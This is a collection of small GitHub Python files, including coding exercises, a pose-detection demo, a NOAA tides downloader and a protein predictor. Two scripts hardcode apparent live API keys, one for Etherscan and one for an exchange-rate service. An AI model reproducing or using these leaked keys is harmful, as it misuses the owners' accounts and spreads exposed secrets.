{"seq_id":"41886672590","text":"# You are given a dictionary consisting of pairs of synonym words. There are no repeated words in the dictionary. Write a\r\n# program that determines the synonym of one given word.\r\n#\r\n# Input format: the program receives the number of synonym pairs n. It is followed by n lines, each line\r\n# containing two synonym words. After that comes one word whose synonym has to be found.\r\n#\r\n# Output format\r\n# The program must print one word, the synonym of the entered one.\r\n#\r\n# Note 1. It is guaranteed that a synonym of the entered word exists in the dictionary.\r\n#\r\n# Note 2. All words in the dictionary start with a capital letter.\r\n\r\nn = int(input())\r\nlis1 = dict([input().capitalize().split() for _ in range(n)])\r\nword = input().capitalize()\r\nfor key, value in lis1.items():\r\n    if word == key:\r\n        k = value\r\n        print(k.capitalize())\r\n        break\r\n    if word.lower() == value:\r\n        print(key)\r\n        break\r\n","repo_name":"Giocatory/PyStudy","sub_path":"Dictionary_Study/synonym_dictionary.py","file_name":"synonym_dictionary.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"ru","doc_type":"code","stars":6,"dataset":"github-code","pt":"75"}
{"seq_id":"32620919098","text":"def parseInput(file_name):\r\n    f = open(file_name, \"r\")\r\n    points = []\r\n    for l in f:\r\n        cur_points = l.strip().split(\"->\")\r\n        cur_points = [p.split(\",\") for p in cur_points]\r\n        for p in cur_points:\r\n            p[0] = int(p[0])\r\n            p[1] = int(p[1])\r\n        points.append(cur_points)\r\n    return points\r\n\r\ndef partOne(file_name):\r\n    points = parseInput(file_name)\r\n    grid = [[0 for i in range(1000)] for j in range(1000)]\r\n    \r\n    for pair_points in points:\r\n        x1, y1 = pair_points[0]\r\n        x2, y2 = pair_points[1]\r\n        if x1 == x2:\r\n            for y in range(min(y1, y2), max(y1, y2) + 1):\r\n                grid[x1][y] += 1\r\n        elif y1 == y2:\r\n            for x in range(min(x1, x2), max(x1, x2) + 1):\r\n                grid[x][y1] += 1\r\n    \r\n    n = 0\r\n    for i in range(1000):\r\n        for j in range(1000):\r\n            if grid[i][j] >= 2:\r\n                n += 1\r\n    return n\r\n\r\n\r\ndef partTwo(file_name):\r\n    points = parseInput(file_name)\r\n    grid = [[0 for i in range(1000)] for j in range(1000)]\r\n    \r\n    for pair_points in points:\r\n        x1, y1 = pair_points[0]\r\n        x2, y2 = pair_points[1]\r\n        if x1 == x2:\r\n            for y in range(min(y1, y2), max(y1, y2) + 1):\r\n                grid[x1][y] += 1\r\n        elif y1 == y2:\r\n            for x in range(min(x1, x2), max(x1, x2) + 1):\r\n                grid[x][y1] += 1\r\n        else:\r\n            x, y = x1, y1\r\n            while x != x2 and y != y2:\r\n                grid[x][y] += 1\r\n                x += int((x2 - x1) / abs(x2 - x1))\r\n                y += int((y2 - y1) / abs(y2 - y1))\r\n            grid[x][y] += 1\r\n    \r\n    n = 0\r\n    for i in range(1000):\r\n        for j in range(1000):\r\n            if grid[i][j] >= 2:\r\n                n += 1\r\n    return n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    print(partOne(\"sample.txt\"))\r\n    print(partOne(\"input.txt\"))\r\n    print(partTwo(\"sample.txt\"))\r\n    print(partTwo(\"input.txt\"))\r\n    # print(partTwo(\"input.txt\"))\r\n","repo_name":"Martiul/Advent-of-Code","sub_path":"2021/day05/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"21198124538","text":"import cv2\nimport mediapipe as mp\nimport time\nimport 
math\nimport numpy as np\n\nclass poseDetector():\n    # static_image_mode=False,\n    # model_complexity=1,\n    # smooth_landmarks=True,\n    # enable_segmentation=False,\n    # smooth_segmentation=True,\n    # min_detection_confidence=0.5,\n    # min_tracking_confidence=0.5):\n    \n    def __init__(self, static_image_mode=False, model_complexity=1, smooth_landmarks=True,enable_segmentation=False,smooth_segmentation=True,min_detection_confidence=0.5,min_tracking_confidence=0.5):\n        \n        self.static_image_mode = static_image_mode\n        self.model_complexity = model_complexity\n        self.smooth_landmarks = smooth_landmarks\n        self.enable_segmentation = enable_segmentation\n        self.smooth_segmentation = smooth_segmentation\n        self.min_detection_confidence = min_detection_confidence\n        self.min_tracking_confidence = min_tracking_confidence\n        self.mpDraw = mp.solutions.drawing_utils\n        self.mpPose = mp.solutions.pose\n        # forward the stored settings to MediaPipe so they actually take effect\n        self.pose = self.mpPose.Pose(self.static_image_mode, self.model_complexity, self.smooth_landmarks, self.enable_segmentation, self.smooth_segmentation, self.min_detection_confidence, self.min_tracking_confidence)\n        self.angle_threshold = 60 # Threshold for the angle to consider as successful curl\n        self.lower_threshold = 160 # Angle above which the arm counts as fully extended\n\n    def findPose(self, img, draw=True):\n        imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n        self.results = self.pose.process(imgRGB)\n        if self.results.pose_landmarks:\n            if draw:\n                self.mpDraw.draw_landmarks(img, self.results.pose_landmarks,\n                                           self.mpPose.POSE_CONNECTIONS)\n        return img\n\n    def findPosition(self, img, draw=True):\n        self.lmList = []\n        if self.results.pose_landmarks:\n            for id, lm in enumerate(self.results.pose_landmarks.landmark):\n                h, w, c = img.shape\n                # print(id, lm)\n                cx, cy = int(lm.x * w), int(lm.y * h)\n                self.lmList.append([id, cx, cy])\n                if draw:\n                    cv2.circle(img, (cx, cy), 5, (255, 0, 0), cv2.FILLED)\n        return self.lmList\n\n    def findAngle(self, img, p1, p2, p3, draw=True):\n\n        # Get the landmarks\n        x1, y1 = self.lmList[p1][1:]\n        x2, y2 = self.lmList[p2][1:]\n        x3, y3 = self.lmList[p3][1:]\n\n        # Calculate the Angle\n        angle = math.degrees(math.atan2(y3 - y2, x3 - x2) -\n                             math.atan2(y1 - y2, x1 - x2))\n        if angle > 180.0:\n            angle = 360 - angle\n        if angle < 0 :\n            angle = -angle\n        \n        \n\n        # print(angle)\n\n        # Draw\n        if draw:\n            cv2.line(img, (x1, y1), (x2, y2), (255, 255, 255), 3)\n            cv2.line(img, (x3, y3), (x2, y2), (255, 255, 255), 3)\n            cv2.circle(img, (x1, y1), 10, (0, 0, 255), cv2.FILLED)\n            cv2.circle(img, (x1, y1), 15, (0, 0, 255), 2)\n            cv2.circle(img, (x2, y2), 10, (0, 0, 255), cv2.FILLED)\n            cv2.circle(img, (x2, y2), 15, (0, 0, 255), 2)\n            cv2.circle(img, (x3, y3), 10, (0, 0, 255), cv2.FILLED)\n            cv2.circle(img, (x3, y3), 15, (0, 0, 255), 2)\n            cv2.putText(img, str(int(angle)), (x2 - 50, y2 + 50),\n                        cv2.FONT_HERSHEY_PLAIN, 2, (0, 0, 255), 2)\n        return angle\n    \n    def provide_feedback(self, img, landmarks, angle, armpit_angle):\n        feedback_text = \"\"\n\n        # Detect relying on momentum\n        if angle > self.angle_threshold and armpit_angle < self.lower_threshold:\n            feedback_text += \"Avoid relying on momentum. 
Control the movement.\"\n\n        # Detect rushing the reps\n        if angle < self.angle_threshold and armpit_angle > self.angle_threshold:\n            feedback_text += \"Slow down and maintain a controlled pace.\"\n\n        # Detect partial range of motion\n        if angle > self.angle_threshold and armpit_angle > self.angle_threshold:\n            feedback_text += \"Ensure full range of motion by extending fully.\"\n\n        # Detect moving elbows\n        if landmarks:\n            left_shoulder = landmarks[11][1:]\n            right_shoulder = landmarks[12][1:]\n            left_elbow = landmarks[13][1:]\n            right_elbow = landmarks[14][1:]\n\n            if abs(left_shoulder[1] - left_elbow[1]) > 30 or abs(right_shoulder[1] - right_elbow[1]) > 30:\n                feedback_text += \"Keep your elbows stable and close to your body.\"\n\n        cv2.putText(img, feedback_text, (70, 100), cv2.FONT_HERSHEY_PLAIN, 2, (0, 0, 255), 2)\n\n# Modify your main loop accordingly\n    \n\ndef main():\n    cap = cv2.VideoCapture('PoseVideos/1.mp4')\n    pTime = 0\n    detector = poseDetector()\n    counter = 0\n    up = True\n\n    while True:\n        success, img = cap.read()\n        landmarks = detector.findPose(img)\n        lmList = detector.findPosition(landmarks, draw=False)\n        \n        #counter\n        current_angle = detector.findAngle(landmarks, 11, 13, 15)\n        armpit_angle = detector.findAngle(landmarks, 23, 11, 13)\n        \n        if len(lmList) != 0:\n            cv2.circle(landmarks, (lmList[14][1], lmList[14][2]), 15, (0, 0, 255), cv2.FILLED)\n        \n        # Provide feedback\n        detector.provide_feedback(img, lmList, current_angle, armpit_angle)\n\n        cTime = time.time()\n        fps = 1 / (cTime - pTime)\n        pTime = cTime\n\n\n        if current_angle < detector.angle_threshold and up:\n            counter += 1\n            up = False\n            state = 2\n        elif current_angle > detector.lower_threshold and not up:\n            up = True\n            state = 0\n        else:\n            state = 1\n\n        # Display the counter value on the image\n        cv2.putText(landmarks, str(counter), (70, 50), cv2.FONT_HERSHEY_PLAIN, 3, (175, 175, 0), 3)\n        cv2.imshow(\"Image\", landmarks)\n        cv2.waitKey(1)\n\nif __name__ == \"__main__\":\n    main()","repo_name":"vuxminhan/opencv-demo","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":5929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"33043431943","text":"#Get GasData\r\nimport requests\r\nimport json\r\nimport time\r\nfrom apscheduler.schedulers.blocking import BlockingScheduler\r\n\r\nsched= BlockingScheduler()\r\n@sched.scheduled_job('cron', second=59, id='test_1')\r\ndef job1():\r\n    r=requests.get(\"https://api.etherscan.io/api?module=gastracker&action=gasoracle&apikey=X5NGFQ256QTUSWQZVR6X9PG7GZ48UUP41A \")\r\n    \r\n    text=r.text\r\n    jsondata=json.loads(text)\r\n\r\n    print(\"LastBlock:\", jsondata['result']['LastBlock'])\r\n    print(\"SafeGasPrice:\",jsondata['result']['SafeGasPrice'])\r\n    print(\"FastGasPrice:\",jsondata['result']['FastGasPrice'])\r\n    print(\"Execution Time:\",time.strftime(\"%H:%M:%S\"))\r\n\r\nsched.start()\r\n\r\n","repo_name":"kathy5311/TelegramBot","sub_path":"Assign1.py","file_name":"Assign1.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"28636348448","text":"# -*- coding: utf-8 -*-\nfrom .tool import URLTool\n\n\nclass Storage(object):\n    \"\"\"\n    Storage class for URLs; it also indexes URLs and deduplicates them.\n    _group_dict groups urls by their column:\n    keys are the columns, values are sets that store the addresses\n    \"\"\"\n\n    def __init__(self):\n        self._group_dict = {}\n\n    def add(self, url):\n        _url = URLTool(url)\n        column = _url.column\n        if column not in self._group_dict.keys():\n            self._group_dict[column] = 
set()\n address = _url.address\n self._group_dict[column].add(address)\n\n def __contains__(self, url):\n _url = URLTool(url)\n column = _url.column\n if column not in self._group_dict.keys():\n return False\n address = _url.address\n if address not in self._group_dict[column]:\n return False\n return True\n","repo_name":"geekKeen/sohu_spider","sub_path":"sohu/datastructures.py","file_name":"datastructures.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71231628083","text":"kw = dict(limit=15)\n\nif starts_with is not None and search_catalog_key is not None:\n kw[search_catalog_key] = \"%s%%\" % starts_with\n\nif search_portal_type is not None:\n kw[\"portal_type\"] = search_portal_type\n\nresult_dict_list = []\nfor brain in context.portal_catalog(**kw):\n obj = brain.getObject()\n\n # There may be objects with different Portal Types, so the only way seems\n # to call the script for each object... The returned dict should only contains\n # 'label' (first line displayed) and 'description' (optional: second line displayed)\n result_dict = obj.getTypeBasedMethod('getCompletionDict',\n fallback_script_id='Base_getCompletionDict')(obj)\n\n result_dict['value'] = obj.getProperty(search_catalog_key)\n result_dict_list.append(result_dict)\n\nfrom json import dumps\nreturn dumps(result_dict_list, indent=4)\n","repo_name":"Nexedi/erp5","sub_path":"bt5/erp5_autocompletion_ui/SkinTemplateItem/portal_skins/erp5_autocompletion_ui/ERP5Site_getCompletionDictList.py","file_name":"ERP5Site_getCompletionDictList.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"75"} +{"seq_id":"43692170927","text":"class Solution:\n def reverseInGroups(self, arr, N, k):\n i = 0\n while i < N:\n start = i\n end = min(i + k - 1, N - 1)\n i += k\n while start < end:\n arr[start], arr[end] = arr[end], arr[start]\n start += 1\n end -= 1\n\n\nif __name__ == \"__main__\":\n nk = [int(x) for x in input().strip().split()]\n N = nk[0]\n K = nk[1]\n arr = [int(x) for x in input().strip().split()]\n\n ob = Solution()\n ob.reverseInGroups(arr, N, K)\n for i in arr:\n print(i, end=\" \")\n print()\n","repo_name":"Pyk017/Competetive-Programming","sub_path":"GFG/Arrays/Reverse Array in Groups/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"31669764684","text":"#!python3\n\n## By Elim Thompson (07/06/2020)\n##\n## This script contains util functions to download and massage data for the pyPlot Challenge. \n################################################################################################\n\n#####################################\n## Import libraries\n#####################################\nimport requests, pandas, numpy\n\n#####################################\n## Define constant\n#####################################\n## API template \napi_template = 'https://tidesandcurrents.noaa.gov/api/datagetter?' 
+ \\\n 'begin_date={begin_date}&end_date={end_date}&station={station}&' + \\\n 'product={product}&datum={datum}&time_zone={time_zone}&units={units}&format=json'\n\ndef pull_data (params):\n\n ''' Download data from API as JSON / dictionary.\n\n input param\n -----------\n params (dict): Must contain keys: begin_date, end_date, station, product, datum, time_zone, and units\n\n output param\n ------------\n content (dict): Downloaded data from API. None if invalid API / response.\n '''\n\n # Fill in the template to get the actual API\n api = api_template.format (**params)\n # Get the response of the API\n response = requests.get (api)\n # If the status code of the response is anything but 200, return nothing\n if not response.status_code == 200:\n print ('Connection failed with {0}.'.format (response.status_code))\n return None\n \n # Get the content of the API as JSON\n content = response.json()\n response.close ()\n # If the content is an error message, something is wrong with the input params.\n # Print the error and return nothing.\n if 'error' in content:\n print ('Error encountered: {0}.'.format (content['error']['message']))\n return None\n # If no data is available, tell user to check the API itself and return nothing.\n if len (content) == 0:\n print ('Empty content encountered. Please check API:\\n{0}.'.format (api))\n return None\n \n return content\n\ndef pull_obs (station, begin_date, end_date, datum='MLLW', time_zone='gmt', units='metric'):\n\n ''' Download observed water level data from API as a dictionary\n\n input params\n ------------\n station (str) : station ID\n begin_date (str): begin date in yyyyMMdd, MM/dd/yyyy, yyyyMMdd HH:mm, or MM/dd/yyyy HH:mm\n end_date (str) : begin date in yyyyMMdd, MM/dd/yyyy, yyyyMMdd HH:mm, or MM/dd/yyyy HH:mm\n datum (str) : E.g. MSL, STND, MHW, MLLW (default), MHHW, etc\n time_zone (str) : Either GMT (default), LST, or LST_LDT\n units (str) : Either english or metric (defaut)\n\n output param\n ------------\n content (dict): Requested observation data from API. None if invalid inputs / API / response\n '''\n\n ## Put the requested parameters in a dictionary\n params = {'begin_date':begin_date, 'end_date':end_date, 'station':station,\n 'product':'water_level', 'datum':datum, 'time_zone':time_zone, 'units':units}\n ## Call pull_data to download data\n return pull_data (params)\n\ndef pull_pred (station, begin_date, end_date, datum='MLLW', time_zone='gmt', units='metric'):\n\n ''' Download predicted water level data from API as a dictionary\n\n input params\n ------------\n station (str) : station ID\n begin_date (str): begin date in yyyyMMdd, MM/dd/yyyy, yyyyMMdd HH:mm, or MM/dd/yyyy HH:mm\n end_date (str) : begin date in yyyyMMdd, MM/dd/yyyy, yyyyMMdd HH:mm, or MM/dd/yyyy HH:mm\n datum (str) : E.g. MSL, STND, MHW, MLLW (default), MHHW, etc\n time_zone (str) : Either GMT (default), LST, or LST_LDT\n units (str) : Either english or metric (defaut)\n\n output param\n ------------\n content (dict): Requested prediction data from API. None if invalid inputs / API / response\n '''\n\n ## Put the requested parameters in a dictionary\n params = {'begin_date':begin_date, 'end_date':end_date, 'station':station,\n 'product':'predictions', 'datum':datum, 'time_zone':time_zone, 'units':units}\n ## Call pull_data to download data\n return pull_data (params)\n\ndef massage_data (content, doPred=False):\n\n ''' Massage data downloaded from API to a pandas time-series dataframe. 
The keys for\n prediction and observation data are different.\n\n input params\n ------------\n content (dict) : Data directly downloaded from API\n doPred (boolean): If True, input content is prediction data. If False, it is observations.\n\n output params\n -------------\n dataframe (pandas.DataFrame): a time-series dataframe of the download data.\n None if input content has invalid format.\n '''\n\n ## Define the key based on prediction / observation data\n apiKey = 'predictions' if doPred else 'data'\n myKey = 'predicted' if doPred else 'observed'\n\n # Try to interpret API content as data frame\n try:\n # Convert dict content to a dataframe\n data = numpy.array ([[aTime['t'], aTime['v']] for aTime in content[apiKey]]).T\n dataframe = pandas.DataFrame ({'datetime':data[0], myKey:data[1].astype (float)})\n # Convert dataframe to a time-series dataframe\n dataframe.index = pandas.to_datetime (dataframe.datetime)\n dataframe = dataframe.drop (axis=1, columns=['datetime']) \n except:\n print ('Failed to interpret data')\n return None\n\n return dataframe","repo_name":"NOAA-CO-OPS/co-ops-pyplot-challenge","sub_path":"myUtils.py","file_name":"myUtils.py","file_ext":"py","file_size_in_byte":5560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41441760045","text":"import requests\n\nclass main:\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.baseCur = input('Enter base currency symbolic notation: ')\n\t\tself.response = requests.get(f'https://v6.exchangerate-api.com/v6/c7aeeeb09a5d7c5ab1c47383/latest/{self.baseCur}')\n\t\tself.data = self.response.json() # Getting data in json format\n\t\tself.conversion = self.data['conversion_rates'] # Getting values and symbolic notations of currencies\n\n\tdef conversion_Base_to_Opted(self):\n\t\tself.usrINP = input(f'How many {self.baseCur}: ')\n\t\tself.usrOPT = input(f'Enter currency code to which {self.usrINP} {self.baseCur} will be converted: ')\n\t\ttry:\n\t\t\tself.usrINP = float(self.usrINP)\n\t\t\tif self.usrOPT in self.conversion:\n\t\t\t\tself.usrOPT_VAL = self.conversion.get(self.usrOPT)\n\t\t\t\tprint(f'{self.usrINP} INR --> {self.usrOPT_VAL * self.usrINP} {self.usrOPT}')\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\nif __name__ == '__main__':\n\tmain = main()\n\tmain.conversion_Base_to_Opted()","repo_name":"PingalPie/Currency-Converter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26253355615","text":"# 41transmembrane.py\n\n# Write a program that predicts which proteins in a proteome are transmembrane\n\n# Transmembrane proteins are characterized by having\n# 1. a hydrophobic signal peptide near the N-terminus\n# 2. 
other hydrophobic regions to cross the plasma membrane\n\n# Both the signal peptide and the transmembrane domains are alpha-helices\n# Therefore, they do not contain Proline\n\n# Hydrophobicity can be measured by Kyte-Doolittle\n#\thttps://en.wikipedia.org/wiki/Hydrophilicity_plot\n\n# For our purposes:\n#\tSignal peptide is 8 aa long, KD > 2.5, first 30 aa\n#\tHydrophobic region is 11 aa long, KD > 2.0, after 30 aa\n\n# Hint: copy mcb185.py to your homework repo and import that\n# Hint: create a function for KD calculation\n# Hint: create a function for hydrophobic alpha-helix\n# Hint: use the same function for both signal peptide and transmembrane\n\nimport sys\nimport mcb185\n\n# create a KD calculation:\n\ndef KD_equ(smseq):\n\n\tKD = 0 \n\t\n\tfor aa in smseq:\n\t\tif aa =='I':\n\t\t\tKD += 4.5\n\t\telif aa == 'V':\n\t\t\tKD += 4.2\n\t\telif aa == 'L':\n\t\t\tKD += 3.8\n\t\telif aa == 'F':\n\t\t\tKD += 2.8\n\t\telif aa == 'C':\n\t\t\tKD += 2.5\n\t\telif aa == 'M':\n\t\t\tKD += 1.9\n\t\telif aa == 'A':\n\t\t\tKD += 1.8\n\t\telif aa == 'G':\n\t\t\tKD += -0.4\n\t\telif aa == 'T':\n\t\t\tKD += -0.7\n\t\telif aa == 'S':\n\t\t\tKD += -0.8\n\t\telif aa == 'W':\n\t\t\tKD += -0.9\n\t\telif aa == 'Y':\n\t\t\tKD += -1.3\n\t\telif aa == 'P':\n\t\t\tKD += -1.6\n\t\telif aa == 'H':\n\t\t\tKD += -3.2\n\t\telif aa == 'E':\n\t\t\tKD += -3.5\n\t\telif aa == 'Q':\n\t\t\tKD += -3.5\n\t\telif aa == 'D':\n\t\t\tKD += -3.5\n\t\telif aa == 'N':\n\t\t\tKD += -3.5\n\t\telif aa == 'K':\n\t\t\tKD += -3.9\n\t\telif aa == 'R':\n\t\t\tKD += -4.5\n\t\telse:\n\t\t\tcontinue\n\treturn KD\n\n\n# create a hydrophobic alpha-helix function\n\ndef alpha_h(smseq):\n\t\n\tproline = 0\n\tfor aa in smseq:\n\t\tif aa == 'P':\n\t\t\tproline += 1\n\t\telse:\n\t\t\tcontinue\n\treturn proline\n\t\n\n# apply the same scan to the signal peptide and the transmembrane regions \n\nproteome = sys.argv[1]\n\nfor name_def, seq in mcb185.read_fasta(proteome):\n\n\tpeptide = 0\n\ttransmem = 0 \n\t\n\tsigpep = 8\n\tfor pos in range(0, 30 - sigpep + 1):\n\t\tsmseq = seq[pos:pos + sigpep]\n\t\tKD = KD_equ(smseq)\n\t\tproline = alpha_h(smseq)\n\t\tif KD / sigpep > 2.5 and proline == 0:\n\t\t\tpeptide += 1\n\t\n\thydro_reg = 11\n\tfor pos in range(31, len(seq) - hydro_reg + 1):\n\t\tsmseq = seq[pos:pos + hydro_reg]\n\t\tKD = KD_equ(smseq)\n\t\tproline = alpha_h(smseq)\n\t\tif KD / hydro_reg > 2.0 and proline == 0:\n\t\t\ttransmem += 1\n\t\n\tif peptide != 0 and transmem != 0:\n\t\tprint(name_def)\n\n\"\"\"\npython3 41transmembrane.py ~/DATA/E.coli/GCF_000005845.2_ASM584v2_protein.faa.gz\nNP_414560.1 Na(+):H(+) antiporter NhaA [Escherichia coli str. K-12 substr. MG1655]\nNP_414568.1 lipoprotein signal peptidase [Escherichia coli str. K-12 substr. MG1655]\nNP_414582.1 L-carnitine:gamma-butyrobetaine antiporter [Escherichia coli str. K-12 substr. MG1655]\nNP_414607.1 DedA family protein YabI [Escherichia coli str. K-12 substr. MG1655]\nNP_414609.1 thiamine ABC transporter membrane subunit [Escherichia coli str. K-12 substr. MG1655]\nNP_414653.1 protein AmpE [Escherichia coli str. K-12 substr. MG1655]\nNP_414666.1 quinoprotein glucose dehydrogenase [Escherichia coli str. K-12 substr. MG1655]\nNP_414695.1 iron(III) hydroxamate ABC transporter membrane subunit [Escherichia coli str. K-12 substr. MG1655]\nNP_414699.1 PF03458 family protein YadS [Escherichia coli str. K-12 substr. MG1655]\nNP_414717.2 CDP-diglyceride synthetase [Escherichia coli str. K-12 substr. 
MG1655]\n...\n\"\"\"\n","repo_name":"FastV1per/homework","sub_path":"41transmembrane.py","file_name":"41transmembrane.py","file_ext":"py","file_size_in_byte":3399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"28974572914","text":"from base.tree import TreeNode\n\n\nclass Solution(object):\n    def hasPathSum(self, root, sum):\n        \"\"\"\n        Check whether there is a root-to-leaf path whose values sum to sum\n        :type root: TreeNode\n        :type sum: int\n        :rtype: bool\n        \"\"\"\n        if not root:\n            return False\n        sum -= root.val\n        if not root.left and not root.right and not sum:\n            return True\n        return self.hasPathSum(root.left, sum) or self.hasPathSum(root.right,\n                                                                  sum)\n\n    def f2(self, root, sum):\n        stack = [root]\n        while stack and root:\n            cur = stack.pop()\n            if not cur.left and not cur.right and cur.val == sum:\n                return True\n            if cur.right:\n                cur.right.val += cur.val\n                stack.append(cur.right)\n            if cur.left:\n                cur.left.val += cur.val\n                stack.append(cur.left)\n        return False\n\n\nif __name__ == '__main__':\n    s = Solution()\n    root = TreeNode([5, 4, 8, 11, None, 13, 4, 7, 2, None, 1])\n    root = TreeNode([1, 2])\n    print(s.hasPathSum(root, 3))\n","repo_name":"scolphew/leetcode_python","sub_path":"leetcode/_112_PathSum.py","file_name":"_112_PathSum.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"11953084121","text":"class UnionFind:\n    def __init__(self,N):\n        self.count = N\n        self.parent = [x for x in range(N)]\n        self.rank = [0]*N\n\n    def find(self,p):\n        if p == self.parent[p]:\n            return p\n        self.parent[p] = self.find(self.parent[p])\n        return self.parent[p]\n    \n    def union(self,p,q):\n        rootP = self.find(p)\n        rootQ = self.find(q)\n        if rootP == rootQ:\n            return\n        if self.rank[rootQ]>self.rank[rootP]:\n            self.parent[rootP] = rootQ\n        else:\n            self.parent[rootQ] = rootP\n            if self.rank[rootP] == self.rank[rootQ]:\n                self.rank[rootP]+=1\n        self.count-=1\nN,M = [int(x) for x in input().split()]\n\nhosts = UnionFind(M)\n\nfor _ in range(M):\n    x,y = [int(x) for x in input().split()]\n    hosts.union(x,y)\n    \nprint(hosts.count)","repo_name":"Hansel34/CPC","sub_path":"Kattis/Python/hoppers.py","file_name":"hoppers.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"2610022861","text":"\nfrom tkinter import Tk,Canvas,StringVar,Button,Label\n\n\nclass VisualCanvas():\n    _janela_ = None\n    _status_ = None\n    _buttonAtualiza_ = None\n    _buttonNovaJanela_ = None\n    _buttonNovaBola_ = None\n    _canvas_ = None\n    _novaJanela_ = None\n    _nrJanela_ = 0\n    def __init__(self,nr):\n        self._nrJanela_ = nr + 1\n        self._janela_ = Tk()\n        print(\"Aqui deveria criara outra variavel\")\n        self._status_ = Label(master=self._janela_)\n        self._buttonAtualiza_ = Button(master=self._janela_,text=\"Comceçar\",command=self.alteraStatus)\n        self._buttonNovaJanela_ = Button(master=self._janela_, text=\"Nova Janela\", command=self.novaJanela)\n        self._buttonNovaBola_ = Button(master=self._janela_, text=\"Nova Bola\", command=self.novaBola)\n\n        self._canvas_ = Canvas(master=self._janela_, height=500, width=500, bg=\"yellow\")\n        self._buttonAtualiza_.pack()\n        self._buttonNovaJanela_.pack()\n        self._buttonNovaBola_.pack()\n        self._status_.pack()\n        self._canvas_.pack()\n    _bola_ = None\n    _bola2_ = None\n    _listaBola_ = []\n    _posInicial_ = 0\n    def moveBola(self):\n        self._canvas_.move(self._bola_,5,0)\n        #self._canvas_.update()\n        
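# after() re-schedules moveBola on the Tk event loop every 300 ms, so the\n        # ball keeps moving without blocking mainloop()\n        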
self._canvas_.after(300,func=self.moveBola)\n\n def moveBola2(self):\n for o in self._listaBola_:\n self._canvas_.move(o[0],o[1],0)\n self._canvas_.after(600,func=self.moveBola2)\n\n def alteraStatus(self):\n print(\"executando status \" + str(self._nrJanela_))\n self._status_.config(text=\"Iniciado\")\n self._bola_ = self._canvas_.create_oval(50, 50, 70, 70, outline=\"black\")\n self.moveBola()\n\n\n def novaBola(self):\n self._bola2_ = self._canvas_.create_oval(50, 300+self._posInicial_, 70, 320+self._posInicial_, outline=\"black\", fill=\"blue\")\n self._posInicial_ += 5\n self._listaBola_.append([self._bola2_,self._posInicial_])\n self.moveBola2()\n\n\n\n def novaJanela(self):\n self._novaJanela_ = VisualCanvas(self._nrJanela_)\n self._novaJanela_.iniciar()\n def iniciar(self):\n self._janela_.mainloop()\n\n","repo_name":"andrelb2000/PYTHON_PUCSP","sub_path":"PROJETO_CANVAS01/VISUAL_CANVAS.py","file_name":"VISUAL_CANVAS.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40646972644","text":"# coding: utf-8\nfrom __future__ import print_function\n\nfrom PySide2.QtCore import QSize, Qt\nfrom PySide2.QtGui import QIcon\nfrom PySide2.QtWidgets import QAction, QToolBar, QWhatsThis\n\nfrom ProfileInspector.src import nuke\n\n\nclass ToolBar(QToolBar):\n def __init__(self):\n QToolBar.__init__(self)\n self.setIconSize(QSize(15, 15))\n self.setToolButtonStyle(Qt.ToolButtonTextUnderIcon)\n self.setMovable(False)\n\n self.setStyleSheet('''\n color: white;\n ''')\n\n self._initial_style = self.styleSheet()\n\n # XXX: for some unknown reason, older pyside2 cannot create a whatsthis instance\n # even though is still a class\n if nuke.env['NukeVersionMajor'] == 11:\n _whats_this = QWhatsThis\n else:\n _whats_this = QWhatsThis()\n\n self._whats_this_btn = _whats_this.createAction(self)\n self._whats_this_btn.setIcon(QIcon(':/icons/question'))\n","repo_name":"sisoe24/ProfileInspector","sub_path":"src/widgets/toolbar.py","file_name":"toolbar.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"75"} +{"seq_id":"26962377586","text":"import argparse\r\nimport numpy as np\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('method', type=str)\r\n parser.add_argument('--dir', type=str, default='temp')\r\n parser.add_argument('--dataset', type=str, default='hq')\r\n parser.add_argument('--subset', type=str, default='abcd')\r\n args = parser.parse_args()\r\n\r\n result = []\r\n split = [[0, 30], [30, 60], [60, 1000]]\r\n mean_len = [[], [], []]\r\n unable_to_achieve_full_coverage = 0\r\n unable_to_explore_in_time = 0\r\n total_eps = 0\r\n\r\n for s in [args.dataset + '-' + i for i in args.subset]:\r\n args.exp_name = f'eval_{args.method}_{s.replace(\"-\", \"\")}'\r\n args.scenes = f'scenes/{s}.scenes'\r\n with open(f'{args.dir}/dump/{args.exp_name}/explored_ratio.txt', 'r') as f:\r\n content = '[' + ''.join(f.readlines()).replace('\\n', '').replace('][', '],[').replace(' ', ',') + ']'\r\n ratio = eval(content)\r\n ratio = np.array([x[-1] for x in 